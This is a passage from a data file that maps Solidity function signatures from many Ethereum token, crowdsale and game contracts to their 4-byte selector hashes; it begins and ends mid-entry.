"suspend(address)": "0x286781c7", "setTreasury(address)": "0xf0f44260", "Membership()": "0xb9c81f1d", "closedown()": "0x955ef429", "closeOrder(uint256,address)": "0xae2e054c", "trade(uint256,uint256,bool,bool)": "0xf67028be", "ITT(uint256,uint8,string,string)": "0x77bd1bfe", "set_time(uint256)": "0x8ae470a9", "DebugClock(uint256)": "0x480b9122", "signer()": "0x238ac933", "signDate(bytes32)": "0x1a9069cf", "authType()": "0x05915147", "signed(bytes32)": "0x775eb900", "transferTraderBalance(address,address)": "0x6a751710", "adminCancelWithdrawal(address,uint160,string)": "0x60ebb498", "adjustCash(address,int160,string)": "0x581ca8bb", "adjustCoins(address,int32,string)": "0x6ce4499c", "fund(address,uint160)": "0x91c4c78f", "unregisterTraderAccount(address)": "0x76ad3abf", "registerTraderAccount(address)": "0xdb85bd78", "seedCoins(address,uint32,string,uint256)": "0xdbff4182", "GxAdminOperations(address)": "0xf4686b42", "TransferBaseContract(address)": "0x38a2fb4f", "removeStrip(uint256)": "0xb881604d", "addStrip(uint256,uint16,uint8,uint8,string,string,string,string,string,string)": "0x298c3dc4", "Xkcd()": "0x067ec02e", "addSwap(string)": "0x2b1453dd", "DredgrSwap()": "0x53db1deb", "presentMissingChunk(bytes)": "0xe5fdac45", "reportMissingChunk(bytes32,uint256,uint8,bytes32,bytes32)": "0xe8850978", "BlockTubePrepaid(address)": "0x83f9a788", "readCube(bytes32)": "0x120149a1", "dumpCube(bytes,bytes32)": "0xa58d3ad1", "forceEmpty(bytes32)": "0xe65a2e7f", "empty(bytes32)": "0x879e4b1a", "softUndelete(bytes32)": "0x53d590bc", "softDelete(bytes32)": "0xda7d86fd", "Blockbin()": "0x6d54340a", "sendFoo(address,uint256,bytes)": "0xe6416f4e", "RedFoo()": "0xf4e340ac", "mulToResult(int256)": "0x8abe789b", "Math(int256)": "0x8ccc4781", "testCombinators()": "0xba9334a0", "testIfElse()": "0xf4ed660f", "testArgOutOfBoundsFail()": "0x565f3624", "addAccountData(string,bytes)": "0x2035d6b4", "getFieldData(uint256)": "0xa1779a3d", "addAddressDescription(string,address)": "0x4a881ac6", "CreditIDENTITY(address)": "0x043cf343", "cashBalanceOf(address)": "0xb2210c91", "allocateCash()": "0x336abddc", "TokenizedSplitter(string,string,uint248)": "0x7481a8aa", "getServerAddress(string)": "0xbafdebf3", "getServerStatus(string)": "0x067e06ee", "setServerStatus(string,uint256)": "0xe7b1d6dd", "removeServer(string)": "0x46ace8fd", "putServerAddress(string,address,uint256)": "0xd8550112", "removecantonEmployee(address)": "0xf6bf0edd", "isCantonEmployee(address)": "0x6bb164c9", "addCantonEmployee(address)": "0xeaec3fc8", "removeInspector(address)": "0x7c70e791", "isInspector(address)": "0x2cdad41c", "addInspector(address)": "0x7e458492", "removeFarmer(address)": "0xe6bf3fdc", "isFarmer(address)": "0xb9429069", "addFarmer(address)": "0x80c3f96d", "deleteProposal(bytes32)": "0xb3d39e63", "cancelVoteInternal(bytes32,address)": "0xa1f1aa66", "refreshReputation(bytes32,address[])": "0x6320212b", "isReservationFull()": "0xab6cf42f", "isBreakingCap(uint256)": "0xdf2d33d5", "setPricingStrategy(address)": "0x50c67734", "Reservation(address,address,address,uint256,uint256,uint256,uint256)": "0x12afef2e", "make(bytes32,bytes32)": "0xbc95f178", "getBuyerOption()": "0x418d75b6", "getSellerOption()": "0x04cbc791", "returnMargin()": "0x25a34aca", "rebalanceMargin()": "0xecc7296b", "initialize(address,address,address,address,address,bytes32,uint256,uint256,uint256,uint256,uint256)": "0x3ccbad50", "CallSpread()": "0x5b405418", "is_valid_event()": "0x7422a127", "isExpiredDeadline()": "0x9dfcc05c", "getDeadline()": "0x5f8d96de", "Deadline(uint256)": "0x02cd0f96", "exchangeToIco(address)": "0x80bb3360", "convert()": "0x91bbdcc7", "transferByOwner(uint256)": "0x3360ac90", "transferFromOwner(address,uint256)": "0x0f18ac07", "determineSalaryTokens(address)": "0x100f2e78", "setExchange(address)": "0x67b1f5df", "setEmployeeStorage(address)": "0x8c8b9d54", "Payroll(address,uint256,uint256)": "0xe73c6353", "deregister(address)": "0x84ac33ec", "updateRegistrar(address)": "0x592b700a", "patronageContractForUsername(string)": "0xb05fa837", "registerUsername(string,address)": "0x8ec6677d", "PatronageRegistry(address)": "0x580ea491", "Faucet(uint256,address)": "0x1bf219de", "getMeterInfoByMonth(uint8,uint256)": "0xdb680e3d", "detectJanuary(uint8)": "0xd7a4a09d", "decrementDate()": "0xcc9e735f", "incrementDate()": "0x05dfedac", "payBill(uint8,uint256)": "0x78f7d9c6", "createMonthlyBill(uint8,uint256,uint256)": "0x4e81b17d", "updateMeterValue(uint256,uint8,uint256)": "0x44e66ee2", "WaterMeterAcorn(bytes32,uint8,uint256,uint256,uint256)": "0x2b5129f5", "getAllSharedAccounts(bytes32)": "0xb1933a0b", "getSharedAccountPw(bytes32,bytes32,bytes32)": "0x3657ba36", "deleteSharedAccount(bytes32,bytes32,bytes32)": "0x7a5bed43", "AddSharedAccount(bytes32,address,bytes32,bytes32,bytes32)": "0x3ce24239", "getAllContact(bytes32)": "0x1801ff10", "getTargetContactPubKey(bytes32,address)": "0x4fd2ee52", "deleteContact(bytes32,address)": "0xfa6b535d", "AlterContactName(bytes32,address,bytes32)": "0x3eb34e09", "AddContact(bytes32,address)": "0x12df9b63", "getAllSocialAccounts(bytes32)": "0x4bce79a1", "getSocialAccountPw(bytes32,bytes32,bytes32)": "0x4ef8885f", "DelSocialAccount(bytes32,bytes32,bytes32)": "0x730736c9", "AltSocialAccountPw(bytes32,bytes32,bytes32,bytes32)": "0x15691522", "AddSocialAccount(bytes32,bytes32,bytes32,bytes32)": "0xaebcd2d9", "setMyPubKey(bytes32,bytes32,bytes32,bytes32,bytes32)": "0xbae70892", "checkNameOccupied(bytes32)": "0xda640668", "getAddressFromName(bytes32)": "0x2e617512", "setMyName(bytes32,bytes32)": "0x7e761240", "getMyPubKey(bytes32)": "0x6284fd22", "getMyName(bytes32)": "0x548c20be", "LoginCheck(bytes32)": "0x198df3b9", "newUserAccount(bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0x5b34f4e2", "getManagerPubkey()": "0xb7700f33", "setTimeLimited(uint256)": "0x4b35ae33", "TokenFunctions()": "0xa8648aad", "startRecovery()": "0x923689e4", "cancelOwnershipTransfer()": "0x23452b9c", "thisisalsofind(uint256)": "0x01d4277c", "arrayaccess(uint256)": "0x92dd38ea", "thisisfine(uint256)": "0xb630d706", "divisionby0(uint256)": "0xa08299f1", "requireisfine(uint256)": "0x78375f14", "assert3(uint256)": "0x546455b5", "assert2()": "0xf44f13d8", "assert1()": "0xb34c3610", "Child(string,address)": "0xde35a696", "getScoreChange(int256,int256)": "0xfe637e5e", "createStandardToken(address,uint256)": "0xf63df2e9", "SFEscrow()": "0xfe082a21", "currentPeriodEtherCollected()": "0x476711cb", "buyEggFee()": "0x1dbb9867", "phase_6_rate()": "0x269445db", "firstRoundICODiscount()": "0x895595d5", "referralPromille()": "0x69da66ea", "getAllTeamScores()": "0xa78a43c1", "CONVERSION_NUMINATOR()": "0x5b9eb8ab", "MINSALESCAP()": "0xffa8c44a", "secondWeekBonusInWeek()": "0x00922db6", "getCurrentStatus()": "0xa3dd2619", "amountEthRaised()": "0xa7292c74", "MBCashSupply()": "0x5d705fe2", "BONUS_LATCH()": "0x4f0693a1", "icoStartTimestampStage1()": "0xa1664ae2", "transactionCount()": "0xb77bf600", "MINCAP_TOKENS_ICO()": "0x093ac512", "badgeSymbol()": "0xae479a63", "tgeSettingsPartProject()": "0x7dd07097", "secondsAfter()": "0x8154b57c", "Address()": "0x3aeaccf5", "lamdenTau()": "0x09f0fe0d", "feePeriodDuration()": "0x22425fa4", "sentToken()": "0x444cef88", "numWhitelisted()": "0x54dacb96", "getRegistration()": "0x5bfb8ff2", "btcEthRate()": "0x72f79b56", "tokenMintedSupply()": "0x61282631", "yearThreeClaimed()": "0xc9116e4a", "listTokenFee()": "0x9d59beb1", "KYCTeam()": "0xc620ecc7", "preBuy2()": "0x529865c9", "tokensSoldWhitelist()": "0xc56d0d67", "CLNTotalSupply()": "0xc73fcee2", "maxBetWei()": "0xfe9ccc1e", "CROWD_WEEK1_BONUS()": "0x8769817a", "maxPrivateSale()": "0x4c64384c", "transferBlocked()": "0x4804e1a2", "checkPayoutReadyState()": "0x1322e9d0", "urbitTeamTokensVault()": "0x2740509d", "totalTulipCount()": "0xb1f29590", "gapTime_()": "0xa65f51c8", "DAILY_PURCHASE_LIMIT()": "0xd511cc49", "lastCrowdsale()": "0x4f97f97f", "cryptaurRecovery()": "0x83187cf4", "privateFundingSupply()": "0xee2fbf3a", "stageNumber()": "0xa92c3231", "payoutOrder()": "0x6cff6f9d", "bonusList()": "0x2a8a8b19", "claimedSupply()": "0xbfc2aa2a", "MAX_UCCOIN_SUPPLY()": "0x75067219", "tokensForFoundersAndTeam()": "0x6aaaae68", "founderWallet()": "0xa23d3c35", "upgradeContract()": "0x1f4e1504", "preSaleSecondEtherCap()": "0x67edad0a", "tokensRemainingPreCrowd()": "0xea74329c", "marketingFunds()": "0x8cc63bfb", "rakeEventPlaceholderAddress()": "0xd40e9b9c", "payoutsPaused()": "0x301cf6e7", "lastReleaseTime()": "0xdfaf734a", "getPayerString()": "0x9115ca43", "inMaintenance()": "0x144a3472", "crowdsaleTokenSupply()": "0x44acb8da", "firstStageRefund()": "0x9a651f0b", "burnMultDen()": "0x7e429f02", "noContestTime()": "0xe668e1f3", "soldTokensOnIco()": "0xdd09de33", "START_PRICE_IN_CENTS()": "0x67b7a4aa", "coolDungeon()": "0xc3fb31a4", "distDivRate()": "0xbaf3a4d4", "Exit()": "0xcff410b4", "relayKingContract()": "0x22f4afb5", "__abortFuse()": "0x6eabcd69", "startTokenSwap()": "0x40482475", "saleAddress()": "0xfffe088d", "DNARtoGoldXchgRate()": "0x3c90ee6a", "totaTeamRemaining()": "0x366bb03c", "fifthExchangeRate()": "0xda85868e", "earlyPresaleEDUSupply()": "0x2bb03ab9", "freezTwo()": "0x8f8f6b52", "preMultisigEther()": "0x9c1b9408", "buyoutDividendPercentage()": "0x9bc3135b", "frozenBalance()": "0x26e6074b", "refererFeePercent()": "0x5d449d7d", "disableAuthentication()": "0xa92d6a48", "community()": "0xdc1fb5a5", "lockStatus()": "0x3e89340f", "getTradingStart()": "0xcdd93332", "getLastDataLength()": "0x12d67c5f", "founder1Wallet()": "0x37a1c540", "MAX_REVENUE()": "0x6ab9aa21", "GetMaximumBet()": "0xfb524c32", "CirculatingSupply()": "0x92d60433", "retainedTokensVault()": "0x6117c9db", "lighthouseFee()": "0x051064c6", "communityGrantsAmount()": "0x1d121dfe", "numOfCurrentEpoch()": "0x018e13d0", "totalGasUtilizing()": "0xc15aec44", "RESERVED_TOKENS_FOR_PRE_ICO()": "0x46ade2de", "minEthContribution()": "0xbe11ce2f", "toTeamEthContract()": "0x504321e0", "getTokenInfo(address,bytes32)": "0xcf3e172b", "symbol(address,bytes32)": "0x6c2d5d26", "name(address,bytes32)": "0xe0e40349", "totalSupply(address,bytes32)": "0x4444e3cd", "decimals(address,bytes32)": "0x3936dbe4", "allowance(address,bytes32,address,address)": "0x0832b925", "balanceOf(address,bytes32,address)": "0x75e42744", "getCrowdsaleWhitelist(address,bytes32)": "0xb568e689", "getWhitelistStatus(address,bytes32,address)": "0x1bde9998", "getRateAndTimeRemaining(uint256,uint256,uint256,uint256)": "0xfcb1804d", "getCrowdsaleStatus(address,bytes32)": "0xa7074a82", "ownerHistoryOf(uint256)": "0x3102be4c", "getCrowdsaleStartAndEndTimes(address,bytes32)": "0x52ad4116", "getCrowdsaleUniqueBuyers(address,bytes32)": "0xa15e3919", "isCrowdsaleFull(address,bytes32)": "0xa0113f18", "getCrowdsaleInfo(address,bytes32)": "0xd0ca1982", "getAdmin(address,bytes32)": "0xb20cedc3", "init(address,uint256,uint256,uint256,uint256,uint256,uint256,bool,address)": "0xb07f1fa2", "whitelistMinTok(address)": "0x97679646", "whitelistMaxWei(address)": "0xf9d49797", "saleWhitelist()": "0xb8f929ad", "Vote(uint256,string,bytes32[])": "0x03b103ea", "isWhitelisted()": "0x611b4095", "ERC20PGEToken()": "0x2c47413f", "endRate()": "0xc505ebce", "startRate()": "0x1254f0dc", "maxSellCap()": "0x9708e250", "totalDuration()": "0x8af6c259", "setLockByPass(address,bool)": "0x61625c3a", "execPermissions(address)": "0x6f5d616b", "setUnlockTimeStamp(uint256)": "0x42f989e2", "DEHT()": "0x6c224487", "setConsumeTokenAddress(address)": "0x4edd0d07", "setFundWallet(address)": "0x55ce3b9a", "_giveToken(address,uint256)": "0xa6491545", "JoyCoin()": "0xb3ea553b", "setJpycContactAddress(address)": "0xfb36fae4", "BUCToken()": "0x71039256", "setPublicSaleWallet(address)": "0x7bb9dc13", "setLevelBonusJPYC(uint256,uint256,uint256,uint256)": "0xcd3651a7", "setLevelPAO(uint256,uint256,uint256,uint256)": "0x9f21edf6", "setMinBuyAmount(uint256)": "0xd494c388", "_getJYPCBonus(uint256)": "0x0ec2c379", "Nickelcoin()": "0x3e83f6cd", "Quiricos()": "0x812699a9", "generate(uint256)": "0x4a7dd523", "setContractFrozen(bool)": "0x7d790630", "setupToken(address,address)": "0xaecd1fed", "Authored(string,string,uint8,uint256)": "0x94d02fff", "batchAllocateTokensBeforeOffering(address[],uint256[])": "0x0126b8b6", "allocateTokensBeforeOffering(address,uint256)": "0x9aaf5e05", "BsToken_SNOV()": "0xad452254", "endOfferingImpl()": "0x2337d9f1", "endOffering()": "0x9be3b286", "startOffering(uint256)": "0xcd863e25", "HubCrowdsale(uint256,address,address)": "0x037ca5fc", "HubToken(address)": "0xd0d390bf", "TGRUPToken()": "0x85f52912", "AmberToken(uint256)": "0x35f931cb", "untrack(uint256)": "0x0ab174a3", "Firmament()": "0xce5ac32d", "SerpentIsRunning()": "0x6e8a3d4b", "getReturns(address,address)": "0x63839777", "getCountdownDate()": "0x61186e23", "CollectReturns()": "0x09a7dbb4", "AddReturnsMapping(uint256)": "0x8854baa8", "setTotalAirDrop(uint256)": "0x92a69395", "AddNewSegment(address,address,uint256,uint256,uint256,string)": "0xec1938a8", "setDistributeAgent(address,bool)": "0x56963c31", "NewSerpent(uint256)": "0x434df07e", "Serpent()": "0xc707936a", "getStr(uint256)": "0xb7e1b974", "setStr(uint256,string)": "0x41d875dc", "buyClixToken()": "0x641d55e0", "getClixToken()": "0xc011cd1c", "transferChildren(address)": "0xf4637003", "transferGenesis(address)": "0xa98cb619", "getMineGenesis()": "0xe12849b2", "myAvailableFunds()": "0x61f6b429", "getMine()": "0xcd008f1a", "registration(address,string)": "0xf10ce7c4", "positionScount1(address,address)": "0x5ebc1db8", "registerUser(address,address,string,uint256)": "0xb25f539d", "getLockPosition1(address)": "0x49ee161b", "registerAdmin(address,string)": "0x79c6a1b8", "currentPayment()": "0x5a5e861e", "isNotRegistered(address)": "0xd8c251b5", "MyTestToken(uint256,uint256,string,string)": "0x83924dea", "Genesis(address)": "0x3b35cde5", "finishDividend()": "0xf598e201", "setHoldersList(address)": "0x8c167076", "changeEthBalance(address,uint256)": "0x67d3d0ec", "returnTotalDividend()": "0x8f3684bf", "returnMyEthBalance(address)": "0xdab09999", "getpurchasersLength()": "0xe79ffa99", "getpurchaserAtIndex(uint256)": "0xb0ae1d64", "Steel()": "0x6cbec01c", "Organicco()": "0x312c0684", "getAllAdIdsByCat(uint256)": "0xe284cbfa", "getAdIdByCat(uint256,uint256)": "0x5237e325", "DOCToken()": "0x65011760", "validateTransfer(address,address)": "0x6f475e7f", "FinalizableToken(string,string,uint8,uint256,address,uint256,address[],uint256[])": "0x99a48e17", "ERC20Token(string,string,uint8,uint256,address,uint256,address[],uint256[])": "0xd3dccb03", "MizuCoin()": "0x5d95a08b", "updateSupply()": "0x0c3f1f14", "howCoin()": "0xba32694c", "killme()": "0x24d97a4a", "subFees(uint256)": "0x9df971c1", "subShares(uint256)": "0xf6a5fa30", "addShares(uint256)": "0x99651db8", "queryShare(address)": "0xbeb40d58", "allBankers()": "0x105e68f0", "quitBanker()": "0x25731e97", "beBanker()": "0x59af143d", "betInfo(bytes32)": "0xe9596db3", "allQueryIds()": "0x7f58b9ee", "playerBet(uint256)": "0x0dea35bf", "fixNoCallback(bytes32)": "0x5bb3e5f6", "ownerResetLockedShares()": "0x43c639e7", "ownerSetGasPrice(uint256)": "0xc3b1037b", "ownerSetGasLimit(uint256)": "0xf9befdef", "ownerSetBankersLimit(uint256)": "0xb85bf538", "ownerSetFee(uint256)": "0x52e2525f", "Roll100()": "0x805bc096", "freezeMultiAccounts(address[],bool)": "0x2424276c", "AdvancedToken()": "0xebbaa1fc", "EnterToken()": "0x00fa7be5", "setStorageTime(uint256)": "0xb28bb2a0", "Npole()": "0xfb58674d", "GiftHasBeenSent()": "0xe0dc892c", "StopGame(uint8)": "0xab5783c4", "StartRoulette(uint8)": "0xf1b6315e", "Play(uint8)": "0xb2c3609b", "Florijn(uint256,string,string)": "0xbb9ba82d", "NaGeBi()": "0x390b4f0c", "LSCKcoin()": "0x7b27739c", "EAT()": "0x405dd87c", "userRegister()": "0x6c6f360e", "Solar()": "0x466f8870", "InfinityHourglass()": "0x7efe64ba", "sendRemaningBalanceToOwner(address)": "0x5a29ee7b", "apolloSpecialTransfer(address,uint256)": "0x17fe5b79", "starting(uint256)": "0xbe54c568", "ApolloSeptemCrowdsaleExtended(address,address)": "0x1120ba47", "ApolloSeptemCappedCrowdsale()": "0x5e33f94d", "sendAllToOwner(address)": "0xd710e2f0", "isWithinICOLimit(uint256)": "0x39dd437b", "isWithinICOTimeLimit()": "0x72e6aca3", "specialTransfer(address,uint256)": "0x5e91c5ed", "ApolloSeptemBaseCrowdsale(address,address)": "0xd02d3892", "Ethereum()": "0xa29256bd", "StandardToken(string,string)": "0xab619e5a", "DynamicSKx2(uint256)": "0x7efd3441", "CyberRailNET()": "0xd23628f1", "tokensRemaining()": "0xc8b08125", "withdrawEIP20Token(address)": "0x790105ff", "withdrawERC20Token(address)": "0x3bdebbe1", "changeReserve(address)": "0xca58da1a", "Owanble()": "0x939fb3bf", "REKT(uint256,address)": "0x7d63a93a", "payPartners()": "0xbbc9f09a", "sendTokensTo(address[],uint256[])": "0x9f569e66", "init(address,address,address,address)": "0x06552ff3", "mulToFraction(uint256,uint256,uint256)": "0x3768bd09", "changeManager(address)": "0xa3fbbaae", "SnowBall()": "0xed26fc86", "_preValidateTokenTransfer(address,uint256)": "0x415a0d46", "forwardTokens(address,uint256)": "0x45e0e412", "Hive()": "0x959a1f08", "destroyCoins(address,address,uint256)": "0xf2cedaa0", "isFrozenAccount(address)": "0x4028db79", "TBOT()": "0x8b44f194", "acceptPayment()": "0xae0aba8c", "ParentToken(uint256,string,uint8,string)": "0x958174a3", "OnetVN()": "0xe1ab7cda", "removeEth()": "0x1f4a6d32", "enableTrading()": "0x8a8c523c", "updateFundingEndBlock(uint256)": "0xe28b0d9a", "changeFundWallet2(address)": "0x3bfa0de9", "changeFundWallet1(address)": "0xb5f187b9", "adjustBalance(address)": "0xec6eb411", "batchAllocate(address[],uint256[])": "0x6473b34a", "setVestingContract(address)": "0x74991569", "IHF(address,uint256)": "0x6f18337d", "OneGameToken(address)": "0x835b862f", "Vantador(address)": "0x1f8fcc45", "MonethaToken(address,uint256)": "0x4e523b91", "BitdealCoin(address)": "0x0d5a13f4", "DCETToken()": "0x492e672e", "burn(address)": "0x89afcb44", "isIncreasedEnough(address)": "0xa88b61aa", "RICHToken()": "0x899b53c9", "setCrowdSaleStart(uint256)": "0x1ff6536c", "getCurrentIcoNumber()": "0x244c757a", "getBurnLine()": "0x6c780868", "BurgerKapija()": "0x3831a8d5", "setToSendLeft()": "0xba067f59", "makePayouts()": "0x65b06136", "TokenWithoutStart(string,string,uint8)": "0xf0f87e98", "marketplace_controller()": "0xc710a2aa", "marketplace_admin_controller()": "0x21ab7fb4", "read_price_floor()": "0xebe36cb0", "read_max_dgx_available_daily()": "0x7a58b058", "read_total_purchased_today(address)": "0xfb51a1ea", "read_total_global_purchased_today()": "0x160c5239", "read_user_purchase_at_index(address,uint256)": "0x991dd5b6", "read_purchase_at_index(uint256)": "0x84bc8d2e", "read_total_number_of_user_purchases(address)": "0xd60743b1", "read_total_number_of_purchases()": "0xc2f3d788", "read_dgx_inventory_balance_ng()": "0x9b69608f", "read_config()": "0xb764e8f5", "read_user_daily_limit(address)": "0x52a27baf", "read_user(address)": "0x39d20a5f", "is_contract(address)": "0x649c07d5", "OmmerToken()": "0x020d4786", "ATC(uint256,string,uint8,string)": "0x258315b3", "setESCBDevMultisig(address)": "0x3c4e7d9f", "issueWithExternalFoundation(address,uint256,bytes32)": "0xe27b73f0", "paymentAffiliate(address)": "0x6a1729aa", "allocationForESCBbyStage()": "0xf95c1a73", "priceForStage(uint256)": "0x22657697", "setESCBCoin(address,address,address,uint256,uint256)": "0xab651065", "ESCBTokenSale(uint256,uint256,address,uint256)": "0xef24bd6b", "SaleWallet(address,address)": "0x074c71e5", "minGoalReached()": "0x6975aa9f", "ESCBCoinPlaceholder(address,address)": "0x38cef1ab", "fund_owner()": "0x2fcdeba1", "addTransaction(address,uint256)": "0x84a37273", "submitTransaction(address,uint256)": "0x1d43b653", "YDToken()": "0xa7775bd7", "BestEther()": "0x146dd8e0", "nextBlock()": "0x83788fce", "getOut()": "0x9cdf1872", "imOut()": "0xaff21b00", "activateGladiator(address)": "0xefc0712c", "throwIn()": "0x7e6dce9c", "addCoins(uint8,uint8,uint256)": "0x9093bc3d", "despawnGladiatorAndAwardCoins(address)": "0xaba1017b", "startGladiatorWithCoin(uint8,uint8,address)": "0x68eb59b0", "Arena()": "0x15919eed", "pseudoRandomUint8(uint8)": "0x601a0e77", "ZTTBToken(uint256,string,string,uint8)": "0xa0605a79", "isRestrictedAddress(address)": "0x03c175ff", "editRestrictedAddress(address)": "0x4ec883d1", "unfreezeTransfersUntil(string)": "0x5166b68f", "TESTH()": "0xcbb8b158", "releaseTokenOwnership()": "0x0337e379", "processPresaleOrEarlyContributors(address[],uint256[])": "0x55426bad", "changeStartAndEndTime(uint256,uint256)": "0x5e0b5d9b", "setCrowdsaleWallet(address)": "0xc5526d16", "FourCrowdsale(uint256,uint256,uint256,uint256,address,address)": "0x7d2dfc30", "addAddresses(address[])": "0x3628731c", "TokenCappedCrowdsale(uint256)": "0x2a6a5394", "Crowdsale(uint256,uint256,uint256,address,address)": "0xfd0c2a76", "recoverERC20Tokens(address,uint256)": "0xb6cba7eb", "FourToken()": "0x3e5615bc", "isTransactionAlreadySettled(address,bytes32)": "0x20e537c7", "calculateHash(address,address,uint256,uint256,uint256)": "0x9980dee2", "calculateManyHash(address,address[],uint256[],uint256,uint256)": "0xccd89ecd", "getTotal(address[],uint256[],uint256)": "0x46567a07", "transferPreSignedMany(address,address[],uint256[],uint256,uint256,uint8,bytes32,bytes32)": "0xa2609759", "transferPreSignedBulk(address[],address[],uint256[],uint256[],uint256[],uint8[],bytes32[],bytes32[])": "0x01a2789e", "transferPreSigned(address,address,uint256,uint256,uint256,uint8,bytes32,bytes32)": "0xe8f95666", "checkContract(bytes32)": "0x48a54fc5", "_contractExists(bytes32)": "0x7da3400b", "close(bytes32,bytes32)": "0xf10ca95a", "open(address,bytes32,uint256,uint256)": "0x0c5ce593", "EtradeMarketsCoin()": "0xfa7e8f7c", "WhiteList()": "0xd3f92288", "tryExec(address,uint256)": "0x55f82589", "tryExec(address,bytes)": "0xf2ebde57", "exec(address,uint256)": "0xf4e0f412", "exec(address,bytes)": "0xbe6002c2", "InternationalModelChain()": "0x5a969f94", "ESCBCoin(address)": "0x168179e2", "MiniMeIrrVesDivToken(address,address,uint256,string,uint8,string,bool)": "0xdc3d2b5c", "checkAdmin(address)": "0x9026dee8", "generatorTransfer(address,uint256)": "0xe5d4610f", "StrategicToken()": "0x658523d9", "YCBToken()": "0x899f9d29", "set_contract2address(address,address)": "0xea5366c1", "set_transferrable(bool)": "0x1f27a8b5", "PEPL()": "0x6ab92ba7", "elenctraToken()": "0x706194b9", "toUint32(bytes)": "0x2e42f860", "protectCharacter(uint32,uint8)": "0x544a026b", "teleportKnight(uint32)": "0xc494c3f7", "distribute(uint128)": "0x34e5a692", "hitCharacter(uint16,uint16)": "0x9ea73895", "generateRandomNumber(uint256)": "0x4303707e", "getRandomDragon(uint256)": "0xb079cf62", "replaceCharacter(uint16,uint16)": "0x39ce743e", "addCharacter(uint32,uint16)": "0x28707f3d", "DragonKing(address,address,uint8,uint8,uint8,uint16[])": "0xb36877c9", "YunJiaMiToken()": "0x08e929b1", "accountBalancePublish(string,string,uint256,string,string,uint256)": "0x29712ebf", "fundValuePublish(uint256,uint256,uint256)": "0x43021202", "accountBalanceCount()": "0x136d1057", "fundValueCount()": "0x30dfc62f", "BNCConverterFactory()": "0x9e13baa4", "withdrawRemainingRewards()": "0x30865362", "oraclizeSetWinner(uint256)": "0x1077135a", "WorldCup(string,string,uint256,uint256,string)": "0xa09b39ae", "BtcThumb(uint256,string,uint8,string)": "0xc270cbeb", "SafeasyToken()": "0xb1f3ec87", "_airdrop(address,uint256)": "0x38bc1b96", "_buy(uint256)": "0x282303b5", "setAirdorpList(address[],bool)": "0x4fa11dd2", "setAirdropParams(bool,uint256)": "0x5047f867", "setEarlyParams(bool,uint256,uint256)": "0x6076a3d5", "CYPHERX()": "0x50635e2f", "setOracleReference(address,address)": "0xe7be5617", "setBZRxToken(address)": "0xbedaa624", "setBZxAddresses(address,address,address,address)": "0x0dc2e439", "DxChainToken()": "0x55152b9d", "Linkmanagement()": "0x1dce77b8", "LylToken(uint256,string,string)": "0x098fc010", "grantFoundersTokens(address)": "0x3814253f", "grantAdvisorsTokens(address)": "0x079caa14", "grantBountyTokens(address)": "0xd1f4df47", "unlockVault()": "0x62f69039", "setManualBonus(uint256,bool)": "0x21cf5132", "grantContributorTokens(address)": "0x56e8596f", "offchainSale(address,uint256)": "0x5cb10016", "BitNauticWhitelist(uint256)": "0xbfd1084f", "sendEthToAddress(address,address,uint256)": "0xa6dea55e", "withdrawEtherOnlyOwner()": "0xb67b1a4d", "SWAP()": "0x04d84108", "ownerModAdmin(address,bool)": "0xe49b4c64", "ownerSetAdmin(address[])": "0x1f107635", "Athena()": "0xfdddb3ae", "KVMToken()": "0x5f598510", "request_withdrawal(uint256,uint256)": "0x2dddf3e1", "GongChuangToken()": "0x5eb604bc", "TimeMachineToken()": "0x8bd87a69", "setEmergentHalt(bool)": "0xa398063a", "getAdrByIndex(uint256)": "0x45bdfedb", "numAdrs()": "0x79c73464", "recordNewAddress(address)": "0x0d83dd8a", "MyartPoint()": "0x1f278d32", "transferLockedFrom(address,address,uint256[],uint256[])": "0x0fce887b", "transferLocked(address,uint256[],uint256[])": "0xb91aedab", "calcUnlock(address,address)": "0x068c017b", "showValue(address,address)": "0xdcf1df05", "showTime(address,address)": "0xa5fa5e52", "balanceLocked(address,address)": "0x7c3e50ff", "balanceUnlocked(address,address)": "0x7193ab70", "setUnlockLater(uint256)": "0xca0cd7c0", "setUnlockEarlier(uint256)": "0xdf51d46b", "removeLocker(address,address)": "0x5e131fa2", "addLocker(address,address)": "0x69030397", "FreyrTokenLocker()": "0xaba70319", "HealthCharityToken(uint256,string,uint8,string)": "0xfc13440c", "SbuyToken()": "0xa244f365", "EtherToken1()": "0xed016620", "CaptainPreSell()": "0xf2928eea", "checkCaptain(address,uint32)": "0xddf08ebc", "CreateCaptainToken(address,uint256,uint32,uint32,uint32,uint32,uint32,uint32)": "0x90c8abd3", "SpeedyNetwork()": "0x614f3994", "GeoGems(address)": "0x6f0166c4", "setDrop(bool,uint256,uint256)": "0x88bff117", "log2Bounds(uint256)": "0x1427f168", "pow2Bounds(int256)": "0xc1266227", "setXTVTokenAirdropStatus(bool)": "0x3faed436", "setXTVNetworkContractAddress(address)": "0x74f91b56", "setXTVNetworkEndorser(address,bool)": "0x01132b70", "MBTCToken(address,uint256)": "0xbc4afa67", "_0xMonacoinToken()": "0xc46093de", "_validFee(uint256,uint256)": "0xed30ec8f", "_takeRdFee(uint256)": "0xc632e654", "getRdFee()": "0x08ee33af", "setRdFee(uint256,uint256)": "0xc03bdbae", "setRdCollectorAddress(address)": "0x75ace438", "WETCC()": "0xfd0d1322", "KPTLToken()": "0x1c41d143", "BDACoin()": "0x26409047", "buildBoolMapping()": "0x0f7a8971", "buildTeamMapping(string,string,string)": "0x309f7421", "setLosers()": "0x33c724ee", "withdrawBet()": "0xb240798e", "getPoolAmounts()": "0x126d5b83", "oraclizeSetWinner(uint256,uint256)": "0x215f1cd1", "bet(string)": "0x74030531", "bountyRefund(address,uint256)": "0x34bed16c", "bountySend(address,uint256)": "0x7b1bc329", "adminRefundTokens(address,uint256,uint256)": "0xbff05aef", "adminSendTokens(address,uint256,uint256)": "0x8dd745bb", "StockusToken()": "0x424aa0e5", "batchTransfer(address[],address[],uint256)": "0xdbf4c54c", "setOperational(address[],bool)": "0x411a1714", "BatchUtils()": "0x9b7ef38c", "Afroin()": "0x014d36f4", "MINEA()": "0xdcba03da", "calculatePotentialPayout(uint256)": "0x631859d0", "calculatePoolAmount(uint256)": "0xf46b5321", "calculateHouseCutAmount(uint256)": "0xef2573fc", "calculateRawPoolAmount(uint256)": "0xaa0bf9ba", "withdrawPayoutFromBet(uint256)": "0xdc420fd2", "withdrawHouseCutFromGame(uint256)": "0x449c7ad3", "ChildDeposit()": "0x20352a6e", "fireDepositToChildEvent(uint256)": "0x41de4181", "doFinalizeSale()": "0x5951317a", "moveFunds()": "0xd0b6ba2a", "changeSaleBlocks(uint256,uint256,uint256)": "0xf0217c32", "setWhitelistStatus(address,bool)": 